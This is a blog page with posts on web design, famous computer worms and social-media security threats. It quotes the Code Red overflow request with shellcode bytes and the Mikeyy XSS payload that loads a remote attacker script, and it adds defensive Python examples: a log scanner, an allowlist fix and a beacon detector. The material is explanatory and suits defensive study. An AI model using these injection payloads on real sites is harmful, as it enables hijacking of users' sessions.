
Thursday, 5 January 2017

8 Web Design Facts that Will Blow Your Mind

If you truly want to understand the web design process, you must look beyond just the outward visual appearance of a website. Very few visitors consider what happens behind the scenes of a website, as different web browsers interpret code to display that site on the screen. Extra milliseconds of loading time, browser variations, the age of the code, and the content itself can completely change a user’s experience and resulting behaviors on a website. Let’s take a look behind the curtain to learn about some of the most surprising and amazing aspects of web design.

1. All web browsers render websites differently

When you look at a website from your home computer using Google Chrome, it might be a completely different experience than your friend has when she browses the same website through Safari on her iPhone. Why does the same website look so different across various browsers? It all depends on parsing and rendering, or the way that browsers translate code and display it on your screen. Some browsers will load the code in a very specific order, and sometimes browsers won’t recognize certain code at all. For more detail on this, HTML5 Rocks has an excellent breakdown of how each browser parses code and renders it on the screen.
Browser differences can make it tricky for you to create a website that provides a great experience to everyone. That’s when professional web designers step in. They are familiar with HTML and CSS standards, known browser issues, and the ways to work around potential hurdles. It’s a web designer’s job to ensure that your website looks good and functions properly across many different browsers. They also perform extensive browser compatibility testing to identify potential issues, and establish necessary fixes for those issues, before a website goes live.

2. Design dictates where users will focus on your website

The Internet has forever changed the way we read and browse content. According to the Nielsen Norman Group’s report, “How Users Read on the Web,” successful websites with a clear and scannable layout have a 47% usability improvement. If a visitor can’t skim through your website and identify key information quickly, they are likely to leave and visit another website instead.
Web designers strive to create sites that direct viewers to the most vital information, such as an online store, your company’s blog, an organization’s history, or other content important to both them and you. Web professionals can also use heat maps and analytic tools to see which buttons and links are popular so that they can continually improve the user experience with future updates on the site.

3. A two-year-old website may be too old

Web designers work hard to keep up with the breakneck pace of technology. Since the web browsers and devices being used to access websites are constantly changing, the way that those websites are designed and developed must change as well. To remain current and relevant, digital professionals must stay on top of the latest coding standards, browser compatibility updates, and search engine algorithms. An outdated website runs the risk of not displaying properly in the web browser, having unexpected formatting issues, or not showing up effectively in search engine results. For this reason, a site that is even two years old may be antiquated if it has not kept pace with these changes.

4. Templates will restrict what you can do with your website

Many people turn to website templates as an “easy way out.” Pre-packaged templates often allow anyone to create a website with little to no coding knowledge. Unfortunately, companies can lose credibility by relying too heavily on templates, which typically include bloated code and unnecessary design elements. Trying to force a template to do something new can make it look patched-together, like a Frankenstein website, and that is if that template will even allow for those needed changes. Many templates are notoriously inflexible in what they will allow for, meaning your site may be painted into a corner. Your organization can benefit the most by having a web presence that is custom-made for your needs and the needs of your customers.

5. Your website’s code helps it to appeal to search engines

You could have the most visually stunning website in the world, but it won’t matter if you don’t have an audience to view and use that website. Web professionals make sure that the way your site is coded will help an audience find your website when they type certain keywords into Google or another search engine. The way that the website is coded even affects how your search engine listings look, from the title of the web page in the search results to the small description of your site that appears below the title. Search engines can be a great source of new traffic to your website, and there are many additional steps that can be taken on a site to fully optimize it for those search engines, but it all starts with coding best practices and ensuring that the foundation of your site is conducive to a good relationship with the search engines.

6. Images and videos can have a positive or a negative impact on your website

Multimedia content, including images and videos, can be a powerful part of a website, but if used improperly, they can also significantly damage a website’s performance. Large image and video files can dramatically slow down the loading time of your website. When visitors have to wait too long for a page to load, you risk them growing impatient with the site and abandoning it altogether. To ensure that any multimedia content that is used on a site engages visitors rather than drives them away, web designers must use images and videos that are optimized for websites. These optimized files will ensure that your page loads quickly while still offering that rich imagery or video content.
Web professionals also avoid outdated multimedia formats, such as Flash, which aren’t supported by many of today’s mobile device platforms. Instead, they favor current standards, like HTML5 video, so that people can access your media from the widest range of devices possible, including computers, tablets, and smartphones.

7. A good website design ranges between $500 – $5000

A pricing infographic by Incion reveals that a good website design can cost between $500 and $5,000. If you’re surprised at this range, consider the number of hours and collective brainpower that goes into optimizing websites for search engines, making content accessible across browsers, and improving overall performance by speeding up your website’s loading times. Designers often rely on specialty software and robust tools to ensure that a website’s code functions the way it’s intended while displaying well.

8. There’s a big difference between responsive and mobile web design

Most people don’t think about the seemingly magical website conversion that happens when they switch between their smartphone and computer. There are two very different approaches to handling shifting screen sizes: mobile design and responsive design.

Mobile design is restrictive. It serves up a separate, and often limited, version of your website that can be used on smartphones and tablets. However, because mobile websites generally provide visitors with the bare basics that the site has to offer, they won’t get to see the full glory of your web design or use it to its full potential.

Responsive design is extremely flexible, allowing websites to resize and reflow their layout based on the visitor’s screen size. This gives visitors a consistent experience from large-screen, high-resolution monitors all the way to the smallest smartphone touchscreens, while also having an experience that is suited to each of those individual devices. Responsive websites will simply adapt to their environment, while maintaining the same stunning images, typefaces, and navigational options.

The complexities of web design are indeed mind-blowing, requiring a high level of updated awareness and attention to detail to create the best website possible. Keep these facts in mind as you move forward with your own web presence!


Wednesday, 4 January 2017

Most Expensive Computer Viruses of All Time


When talking about the most expensive computer viruses of all time, it’s important to understand that from time to time cyberspace experiences different security challenges. One of the foremost challenges has been the computer virus. If you scan through the World Wide Web, you will come to know about thousands of different computer viruses. However, from such a huge list only a few have been successful in affecting computer systems and networks globally. Only a few have succeeded in causing damages worth billions of dollars. This article presents the list of the 5 most expensive computer viruses of all time.
  1. MyDoom - over $38.5 billion in damages

Mydoom is primarily transmitted via e-mail, appearing as a transmission error, with subject lines including "Error", "Mail Delivery System", "Test" or "Mail Transaction Failed" in different languages, including English and French. The mail contains an attachment that, if executed, resends the worm to e-mail addresses found in local files such as a user's address book. It also copies itself to the “shared folder” of peer-to-peer file-sharing application KaZaA in an attempt to spread that way.
Mydoom avoids targeting e-mail addresses at certain universities, such as Rutgers, MIT, Stanford and UC Berkeley, as well as certain companies such as Microsoft and Symantec. Some early reports claimed the worm avoids all .edu addresses, but this is not the case.
The original version, Mydoom.A, is described as carrying two payloads:
  • A backdoor on port 3127/tcp to allow remote control of the subverted PC (by putting its own SHIMGAPI.DLL file in the system32 directory and launching it as a child process of the Windows Explorer); this is essentially the same backdoor used by Mimail.
  • A denial-of-service attack against the website of the controversial company SCO Group, timed to commence 1 February 2004. Many virus analysts doubted if this payload would actually function. Later testing suggests that it functions in only 25% of infected systems.
A second version, Mydoom.B, as well as carrying the original payloads, also targets the Microsoft website and blocks access to Microsoft sites and popular online antivirus sites by modifying the hosts file, thus blocking virus removal tools or updates to antivirus software. The smaller number of copies of this version in circulation meant that Microsoft's servers suffered few ill effects.
  2. SoBig - $37 billion in damages

The Sobig Worm was a computer worm that infected millions of Internet-connected, Microsoft Windows computers in August 2003.
Although there were indications that tests of the worm were carried out as early as August 2002, Sobig.A was first found in the wild in January 2003. Sobig.B was released on May 18, 2003. It was first called Palyh, but was later renamed to Sobig.B after anti-virus experts discovered it was a new generation of Sobig. Sobig.C was released May 31 and fixed the timing bug in Sobig.B. Sobig.D came a couple of weeks later followed by Sobig.E on June 25. On August 19, Sobig.F became known and set a record in sheer volume of e-mails.
The worm was most widespread in its "Sobig.F" variant.
Sobig is not only a computer worm in the sense that it replicates by itself, but also a Trojan horse in that it masquerades as something other than malware. The Sobig.F worm will appear as an electronic mail with one of the following subjects:
  • Re: Approved
  • Re: Details
  • Re: Re: My details
  • Re: Thank you!
  • Re: That movie
  • Re: Wicked screensaver
  • Re: Your application
  • Thank you!
  • Your details
It will contain the text: "See the attached file for details" or "Please see the attached file for details." It also contains an attachment by one of the following names:
  • application.pif
  • details.pif
  • document_9446.pif
  • document_all.pif
  • movie0045.pif
  • thank_you.pif
  • your_details.pif
  • your_document.pif
  • wicked_scr.scr
  3. ILOVEYOU - $15 billion in damages

ILOVEYOU, sometimes referred to as Love Letter, was a computer worm that attacked tens of millions of Windows personal computers on and after 5 May 2000[1] local time in the Philippines, when it started spreading as an email message with the subject line "ILOVEYOU" and the attachment "LOVE-LETTER-FOR-YOU.txt.vbs". The latter file extension (in this case, 'VBS' - a type of interpreted file) was most often hidden by default on Windows computers of the time, leading unwitting users to think it was a normal text file. Opening the attachment activated the Visual Basic script. The worm did damage on the local machine, overwriting random types of files (including Office files, image files, and audio files; however, after overwriting MP3 files the virus would hide the file), and sent a copy of itself to all addresses in the Windows Address Book used by Microsoft Outlook. In contrast, the Melissa virus only sent copies to the first 50 contacts.

4. Conficker - $9.1 Billion in damages

Conficker, also known as Downup, Downadup and Kido, is a computer worm targeting the Microsoft Windows operating system that was first detected in November 2008. It uses flaws in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet, and has been unusually difficult to counter because of its combined use of many advanced malware techniques. The Conficker worm infected millions of computers including government, business and home computers in over 190 countries, making it the largest known computer worm infection since the 2003 Welchia.
Aliases used by antivirus vendors:
  • Mal/Conficker-A (Sophos)
  • Win32/Conficker.A (ESET)
  • Win32/Conficker.A (CA)
  • W32.Downadup (Symantec)
  • W32/Downadup.A (F-Secure)
  • Conficker.A (Panda)
  • Net-Worm.Win32.Kido.bt (Kaspersky)
  • W32/Conficker.worm (McAfee)
  • Win32.Worm.Downadup.Gen (BitDefender)
  • Win32:Confi (avast!)
  • WORM_DOWNAD (Trend Micro)
  • Worm.Downadup (ClamAV)
Type: computer virus (subtype: computer worm)

5. Code Red - $2 Billion

Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.
The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh; it exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.[1]
Although the worm had been released on July 13, the largest group of infected computers was seen on July 19, 2001. On this day, the number of infected hosts reached 359,000.
Common name: Code Red
Technical name: CRv and CRvII
Type: server-jamming worm
Isolation: July 15, 2001

The payload of the worm included:
  • Defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
  • Other activities based on the day of the month:
    • Days 1–19: Trying to spread itself by looking for more IIS servers on the Internet.
    • Days 20–27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.
    • Days 28–end of month: Sleeps, no active attacks.
When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interprets this string as computer instructions, propagating the worm.
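As an added example (not code from the original post), here is a small Python scanner that reads Apache common-log-format lines and flags requests with the shape quoted above: a `/default.ida` request whose query is a long run of `N` filler followed by `%uXXXX`-encoded bytes. It matches on that structure rather than on particular payload bytes, which is why hosts that never ran IIS still see these entries. The log lines, addresses and function names are constructed for this illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Apache common log format: ip ident user [timestamp] "METHOD target PROTO" status size
CLF_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)
# Shape of the request quoted in the text: a long run of 'N' filler in the
# /default.ida query string, followed by %uXXXX-encoded bytes.
FILLER_RUN = re.compile(r"N{20,}")
UNICODE_ENCODED = re.compile(r"(?:%u[0-9a-fA-F]{4})+")

# Constructed sample log (addresses from the documentation ranges, not real
# hosts). Lines 1-2 imitate the probe; line 3 is a normal request; line 4 asks
# for /default.ida without the overflow query and must not be flagged.
_PROBE = "/default.ida?" + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3=a"
_SHORT_PROBE = "/default.ida?" + "N" * 30 + "%u9090%u6858=a"
SAMPLE_LOG = (
    f'203.0.113.7 - - [19/Jul/2001:10:12:01 +0000] "GET {_PROBE} HTTP/1.0" 404 209\n'
    f'198.51.100.23 - - [19/Jul/2001:10:12:05 +0000] "GET {_SHORT_PROBE} HTTP/1.0" 404 209\n'
    '192.0.2.44 - - [19/Jul/2001:10:13:44 +0000] "GET /index.html HTTP/1.1" 200 1043\n'
    '192.0.2.44 - - [19/Jul/2001:10:13:45 +0000] "GET /default.ida HTTP/1.1" 404 209\n'
)


@dataclass
class Finding:
    ip: str
    timestamp: str
    status: int
    filler_len: int       # length of the longest 'N' run in the query
    encoded_chunks: int   # number of %uXXXX units in the query


def classify_target(target: str) -> Optional[Tuple[int, int]]:
    """Return (filler_len, encoded_chunks) when the request target has the
    shape of the Code Red probe, else None.  Matching on the path and the
    structure of the query rather than on specific bytes means hosts that do
    not run IIS at all (Apache answers these with 404) are still covered,
    which is exactly the indiscriminate scanning the text describes."""
    path, _, query = target.partition("?")
    if path.lower() != "/default.ida":
        return None
    filler_len = max((len(m.group(0)) for m in FILLER_RUN.finditer(query)), default=0)
    encoded_chunks = sum(len(m.group(0)) // 6 for m in UNICODE_ENCODED.finditer(query))
    if filler_len == 0 and encoded_chunks == 0:
        return None
    return filler_len, encoded_chunks


def scan_access_log(text: str) -> List[Finding]:
    """Parse common-log-format lines and return one Finding per probe."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = CLF_LINE.match(line)
        if not m:
            continue  # tolerate malformed lines instead of aborting the scan
        shape = classify_target(m.group("target"))
        if shape is None:
            continue
        findings.append(Finding(m.group("ip"), m.group("ts"), int(m.group("status")), *shape))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.ip} {f.timestamp} status={f.status} filler={f.filler_len} chunks={f.encoded_chunks}")
```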
About the Author: Indranath Mitra (Partner, Star Softwares). I discussed the Most Expensive Computer Viruses of All Time. Now that you have a better understanding of these risks, what options do you have to better protect your PC against them?

Tuesday, 3 January 2017

Social Media- A Hacker's Favorite Target.


Abstract
Social networks are an inherent part of today’s Internet and are used by more than a billion people worldwide. These sites expose children to various risks, such as online bullying, disclosure of personal information, cyber-stalking, access to inappropriate content, child abuse, etc. In addition, there are many more risks, such as fake profiles with false information, malicious applications, spam, and fake links that lead to phishing attacks.


1. Spamming in social networks
Spam is usually unwanted e-mail advertising for a product, sent to a list or group of e-mail addresses. Spammers send their unwanted mails or messages to the billions of users of social networking sites, which are free and easily accessible, in order to gather the personal information of unsuspecting users.

Twitter has drastically improved their internal spam detection and filtering in 2010, bringing the spam message portion down to 1%, from 10% in 2009. With 65 million tweets per day that still means 650,000 are spam, but it is much better than the 90% spam rate that we currently encounter with email.

Trojan.Bredolab spoofed email

In addition to the spam inside the social networks, the brand reputations of social networks are often misused in order to boost the credibility of bulk mails sent outside of the social network. For example, spoofed emails claiming to come from the support center, notifying users about new friend requests or password resets, have made their way through the Internet. Since people are used to receiving contact requests from forgotten friends they often do not fully inspect the message, instead clicking the link in the notification email. Some contain links to malicious websites; others use the old, but still working, approach of attaching a malicious file carrying a Trojan.

Spam mail spoofing Facebook message

2. Social engineering threats

  A. Placing baits in social networks

Search Engine Optimization (SEO) poisoning, including image poisoning, has recently been pushed again. The idea is simple: use keywords and links in such a way that the attacker’s sites are ranked very high and appear in the first search results. Similar attacks can also happen in social networks.

Tweets with links to malware

  B. Follower scams

Some websites offer free services where you have to hand over your account name and password and they will in turn ensure that you acquire many new followers per day. Obviously it is a bad idea to share your password with strangers, since you cannot control what will be done with your account. In most cases it is also against the terms and conditions of the social network.

Twitter followers advertisement

  C. Impersonation of celebrities

A few fake profiles of celebrities have been created on various social networks. Unfortunately there is little stopping someone from registering a new account under the name of a celebrity and using a publicly available photo as a profile picture.

Fake David Beckham profile with spam messages


The Verified Twitter account of Bill Gates


  D. Impersonation of friends

Phishing attacks and local information-stealing Trojans are currently the most common causes of stolen account passwords. Once an attacker obtains the password of an account he can start to send out messages or update the profile status. These update messages often include links to other malicious sites in order to get more account passwords. As the message seems to come from a friend’s account, people tend to trust it. This inherent trust, and the usual curiosity, leads to a high click rate on those malicious links, making the attacks very successful. Users should be aware that even messages coming from confirmed friends might have been auto-generated by malware. Therefore do not blindly click on links in messages and be vigilant, especially when asked to log in or download further content, such as video players.



  E. Koobface

The Koobface worm was one of the first large malware attacks targeting social networks, and years later it is still widespread and active. It is very successful because it uses clever social engineering and counts on the link-opening behavior of social media users. The current variants send direct messages from infected users to all their friends on Facebook and other networks, but it is also capable of updating status messages or adding text to profile pages.

Fake YouTube site created by W32.Koobface


  F. Phishing

A phishing attack uses a fake site that closely mimics the original site. These days social networking phishing comes in different flavors, just like the phishing attacks on banks and popular trading websites. Social networking phishing arrives as fake mails and messages offering specialized themes, asking the user to update the profile, or to update security applications or features, etc.

Orkut phishing site using a Brazil carnival theme


  G. Advance fee scams

Since people willingly disclose a lot of private information, a scammer can easily identify possible victims who will fall for the scam and adjust the motives that the chosen social engineering trick will exploit. These types of scams typically come with a nice matching story that promises the victim some enormous benefit with apparently no strings attached. Later the scammer informs the user about some unforeseen problem that requires a small amount to be paid up front. After the money is paid the attacker disappears, along with the promised benefits.
3. Applications & widgets in social networks

Some social networks allow active content to be embedded in the form of applications or widgets. These applications can then interact with the user and his group of friends. Unfortunately, that sometimes allows them to covertly access some information or even attack users or other applications. The following sections show some examples of attacks that we observed.

Example 1 – Never Text Again

In July 2010 around 300,000 people fell for a shady application in Facebook. Suddenly more and more personal profiles started showing a message with the following text:

I am shocked!!! I’m NEVER texting AGAIN since I found this out. Video here: http://bit.ly/[REMOVED] - Worldwide scandal!

Malicious Facebook application install page

Facebook application permission dialog

Automatically posted Facebook message by malicious app
Fake security check notification from a malicious application
Application settings removal confirmation page

Example 2 – Candid Camera Prank

Social engineering message and picture posted by malware

Your FLV Player seems to be out of date. Please update your FLV Player in order to proceed. Please click the Continue button now and wait a few seconds.



What applications can do

As an example, Facebook has two basic application types. First, there are social plug-ins, which allow the integration of basic Facebook features into any website. Second, there are canvas applications, which do interact with the profile: they can send update messages or open a new page, which in turn can contain nearly anything.
The “Like” button that allows people to inform others about the existence of a page is an example of a social plug-in. The other applications can, to some extent, load code from remote websites and execute it.
Permission request page of test application, designed by author


Here is a selected list of some of the things an application can get permission for:
  • Access the public information: this includes the user’s name, profile picture, list of friends, and all other public parts of the profile.
  • Access the profile information: this includes any additional information, such as birthday, favorite movies and books, etc.
  • Send email: this means sending direct emails to the registered email address.
  • Access posts in the News feed: this allows the application to read the posted messages.
  • Access family and relationships information.
  • Access photos and videos.
  • Access friends’ information: this includes their details, birthdays, etc.
  • Access the data at any time: this means the application can access the data even if the user is logged out and not using the application at that moment.
  • Post to the wall: add new message posts on the user’s behalf.

Default friends application access permissions


4. Content threats

Infected profile sites- Sometimes someone finds a bug in the implementation, or a case that was not considered, that still allows the uploading of malicious content. One of the most dangerous cases is if it is possible to include arbitrary remote content. This allows an attacker, among other things, to embed web-attacking toolkits inside profile sites, generating a massive drive-by download attack against everyone viewing the infected profile.
Malicious links- Since users control the content of their own profile they can add malicious content to the pages. One of the most obvious attacks is to redirect the user to an external malicious site which is fully controlled by the attacker. The posts can be made deliberately on specially registered dummy accounts or unwillingly by script attacks.
URL shortening services- URL shortening services have been around for years. Today such a service is usually a short domain name combined with a lookup table that maps each short key to exactly one long URL and redirects visitors accordingly. This allows a user to create a short URL out of any given long link.

For example, if you receive the following Bit.ly short URL: http://bit.ly/XuX9i you can append a plus sign at the end of the URL, which will then open a preview page when visited that explains more about the target page. In this case this would be: http://bit.ly/XuX9i+


5. Script threats

  A. Manual script attacks

One of the simplest attack classes that we have seen on social media is the manual script attack, so called because the victim is asked to copy and execute the script manually.

If a user clicks the link he or she will be asked to follow a few simple instructions. In this case the instructions are:

  1. Click the Like button (This will generate an entry on the user’s profile site.)
  2. Press CTRL+C
  3. Press ALT+D
  4. Press CTRL+V
  5. Press ENTER

Manual script attack first step instruction

Following the instructions step by step will copy hidden JavaScript, focus the user’s URL bar, paste the JavaScript, and then execute it. By doing so, the script is able to use the currently logged-in session to send messages to all the user’s friends, asking them to repeat the cycle.

Manual script attack instructions
 

  B. Cross-site scripting (XSS)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.

In April 2009, Twitter was hit by a couple of XSS worms. One of these, later dubbed Mikeyy, did not cause any direct damage or download other malware, but it definitely kept a lot of people busy and is a good example of the potential of such attacks. What had happened was that someone found an XSS vulnerability in one of the attributes in the cascading style sheets (CSS) of the Twitter profile sites. The user was allowed to modify some of the color values of the profile’s CSS. Unfortunately a malicious user could send unexpected characters for the color value, resulting in custom code being executed by the browser. Instead of a simple style tag, as shown below, the attacker was able to submit a closing tag for the style element followed by a script element that pointed to his remote malicious script.


Normal tag:
<style type="text/css"> a { color: #0000ff; } </style>

Modified tag with embedded script code:
<style type="text/css"> a { color: #
</style>mikeyy:) "></a><script src=http://mikeyylolz[REMOVED].com/x.js> </script>

Using this hole it was possible to load a small bit of JavaScript code that would execute whenever someone would view an infected profile.
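As an added illustration (not code from the original post or from Twitter), here is a minimal Python model of the flaw just described: one rendering function interpolates the user-supplied colour straight into the style element, as the vulnerable profile page did, and the hardened version only ever reaches the template with a value that passed an allowlist check. The function names, the sample inputs and the placeholder host example.invalid are this example's own.

```python
import re

# Constructed inputs. The second has the shape of the Mikeyy submission quoted
# above, with a placeholder host instead of the real one.
LEGIT_COLOR = "0000ff"
BREAKOUT_COLOR = (
    '\n</style>mikeyy:) "></a>'
    '<script src=http://example.invalid/x.js> </script>'
)

# A CSS hex colour is a 3- or 6-digit hex triplet and nothing else.
HEX_COLOR = re.compile(r"[0-9a-fA-F]{3}|[0-9a-fA-F]{6}")


def render_profile_css_vulnerable(color: str) -> str:
    """Interpolates the user-supplied colour straight into the style element,
    which is the defect: nothing stops the value from closing the element."""
    return f'<style type="text/css"> a {{ color: #{color}; }} </style>'


def validate_hex_color(color: str) -> str:
    """Allowlist check.  HTML-escaping alone is the wrong tool here because
    the value lands in a CSS context, where characters other than < and >
    also change meaning; accepting only a hex triplet removes the problem."""
    if not HEX_COLOR.fullmatch(color):
        raise ValueError(f"rejected colour value: {color!r}")
    return color.lower()


def render_profile_css_hardened(color: str) -> str:
    """Same template, but only ever reached with a validated colour."""
    return render_profile_css_vulnerable(validate_hex_color(color))


def is_accepted(color: str) -> bool:
    """True if the allowlist lets the value through."""
    try:
        validate_hex_color(color)
        return True
    except ValueError:
        return False


def escapes_style_context(rendered: str) -> bool:
    """Detect a breakout in a rendered fragment: more than the one expected
    </style> close tag, or a <script> element anywhere in it."""
    body = rendered.lower()
    return body.count("</style>") != 1 or "<script" in body


if __name__ == "__main__":
    print(escapes_style_context(render_profile_css_vulnerable(LEGIT_COLOR)))     # False
    print(escapes_style_context(render_profile_css_vulnerable(BREAKOUT_COLOR)))  # True
    print(is_accepted(BREAKOUT_COLOR))                                           # False
```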


  C. Cross-site request forgery (CSRF)

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

  D. Clickjacking

Generally, clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while they click on seemingly innocuous Web pages. Clickjacking takes the form of embedded code or script that can run without the user's knowledge.

Clickjacking example with two layers
 

6. Design issues

A. Privacy

Most social networks allow a user to set different privacy settings for confirmed friends in contrast to public strangers. In some cases, a user can decide to share his private email address with all his connected friends but keep it invisible to someone just browsing his public profile. For example, Facebook distinguishes three groups of visitors: direct “friends”, “friends of friends”, and “everyone”. For a list of different information pieces the user can decide how far he wants to share that information. The default sharing setting, “everyone”, is pretty liberal and shares a lot of information. Many users might not be aware of this and would probably like to adjust their privacy settings.

Facebook privacy settings
B. Information disclosure

It is clear that since one of the main purposes of a social community is to share information, some information will be disclosed to others.

  1. Revealing location data- People like to socialize and share what’s on their mind. This includes, by nature, information that might be misused. One of the attributes that is often overlooked is the location data that is passed along. Many people are broadcasting information about exactly where they are, which is not an issue per se, but this information can obviously also be misused for stalking or other shenanigans.
  2. Revealing identity- In some groups, social networks can be directly linked to Internet users on other platforms and since they provide a real name, also identify a user behind an anonymous action.

C. Insecure frameworks

Since social network platforms are getting more and more complex, it is not astonishing that from time to time some vulnerabilities in their frameworks are discovered. The severity ranges from accessing private information of other users to modifying other users’ accounts.

D.  Misuse as control structure

Given the well-distributed architecture of social networks, their good Internet connections make them a primary candidate for botnet control.

  1. Botnet control over status messages- There have been attempts to misuse social networks as a command and control structure for botnets. This does not come as a surprise, especially after several ISPs have been shut down in order to eradicate botnets. The botnet creators have been searching for more robust means of controlling their assets. Trojan.Whitewell is one such bot, periodically checking the mobile version of a predefined Facebook account. The attacker can submit a new post to the profile in order to have the bot download and run a file from a URL or contact a web server to get new commands.

Bot Twitter account with encoded commands

  2. Information sharing- Besides using social networking profiles as command structures, they can also be used for storing updates or dropping off information. Just think of a Trojan that downloads a binary update from a predefined profile. To make it harder to trace, the updates could be embedded in a media file, such as a picture. The updated Trojan could then send its gathered data, such as local passwords, back to another profile as encrypted text updates. If the information is obfuscated enough it could blend into the normal expected traffic and be accessed from anywhere.
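The periodic polling of a fixed profile described above is what a network defender can look for: people browse at irregular intervals, a bot on a timer does not. The following is an added example, not part of the original paper, of a small beacon detector run over constructed proxy log lines; the log format, hosts, client addresses and profile paths are all made up for the illustration.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log excerpt (format: "timestamp client_ip host path").
# 10.0.0.5 fetches the same profile every ~5 minutes; 10.0.0.7 browses normally.
SAMPLE_LOG = """\
2010-03-01T10:00:00 10.0.0.5 m.social.example /profile.php?id=123
2010-03-01T10:00:04 10.0.0.7 m.social.example /home.php
2010-03-01T10:05:00 10.0.0.5 m.social.example /profile.php?id=123
2010-03-01T10:07:31 10.0.0.7 m.social.example /profile.php?id=999
2010-03-01T10:10:00 10.0.0.5 m.social.example /profile.php?id=123
2010-03-01T10:15:01 10.0.0.5 m.social.example /profile.php?id=123
2010-03-01T10:19:45 10.0.0.7 m.social.example /messages/
2010-03-01T10:20:00 10.0.0.5 m.social.example /profile.php?id=123
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_log(text):
    """Yield (timestamp, client, host, path) for every well-formed log line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)


def find_beacons(text, min_hits=4, max_jitter=0.1):
    """Return {(client, host, path): period_seconds} for request series whose
    inter-request gaps are nearly constant (coefficient of variation below
    max_jitter). Series with fewer than min_hits requests are ignored so a
    user refreshing a page twice is not flagged."""
    series = defaultdict(list)
    for ts, client, host, path in parse_log(text):
        series[(client, host, path)].append(ts)
    beacons = {}
    for key, times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean < max_jitter:
            beacons[key] = round(mean)
    return beacons  # {("10.0.0.5", "m.social.example", "/profile.php?id=123"): 300}
```

On real proxy or DNS logs the same logic needs a longer window and a whitelist for legitimate pollers (mail clients, update checks) before it is useful as an alert.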


Best practice tips

1. Be skeptical
Social networks can be a useful source for business information, as well as for newsworthy updates from your friends. But they also contain a lot of useless information. Generally speaking, you should treat anything you see online with a high degree of skepticism. Do not believe everything you read, be it financial advice, breaking news, or tips on free giveaways—especially if it involves clicking a link or installing an application. If someone asks you for money in advance, it might be a scam.

2. Check privacy policies & settings
All major social networking services have specific privacy guidelines and rules that are published on their websites. Make sure you understand them, even though they may be tedious to read, as they likely explain if your information is shared with other parties. Some services offer the ability to restrict your privacy settings for specific groups, such as allowing you to share pictures with your friends only and not everyone. Make good use of these settings.


3. Good passwords
Use good, strong passwords. (Your birth date or “123456” are not good passwords.) If possible, the password should contain letters and numbers, as well as special characters. If you can’t remember complex passwords, either use a passphrase as a hint or use any of the available password management utilities that can securely store them for you. Do not choose a password that can be guessed from the information that you have published on your account site. This includes friends’ names, favored movie stars, or pet names.

4. Protect the password
You should never share your password with others. This includes services that promise to help you get more friends or something similar. Do not lose control of your password. If you enter your password, ensure that you are on the real website and not a phishing scam page that just looks like the original site. Should you suspect that you have fallen for a phishing attack and your account has been compromised, use a clean computer to log into the original service and change your password.

5. Be thoughtful
Always think twice before posting something. Keep in mind that once you have posted it, even to a close group of friends, you no longer have control over where it will be reposted and who might read it. These things can come back to haunt you when you search for a new position in the future. Consider whether you really need to publish the full information. This includes posting too many personal details, such as phone numbers or work-related things. Furthermore, refrain from forwarding virus hoaxes or exaggerated warning messages that will confuse more than help other users. Be nice and respectful to others—do not post hate messages about others, since you would not want to receive them yourself.

6. Be wary
People on the Internet are not always who they claim to be. The celebrity who you are following might just be another fan, and the supposed co-worker from another office might just be someone doing reconnaissance on your enterprise. Not everyone that claims to be your friend is your friend.

7. Stay updated
Always ensure that the software you use is up to date. Not only does this include the operating system and web browser, but also third-party plug-ins, such as PDF viewers. Install all the latest patches and hotfixes from the official site, and let the software automatically check for newer available versions.


8. Stay protected
Some of the newer attacks are very sophisticated and are sometimes hard to spot for an untrained eye. Use comprehensive security software to protect against these threats.


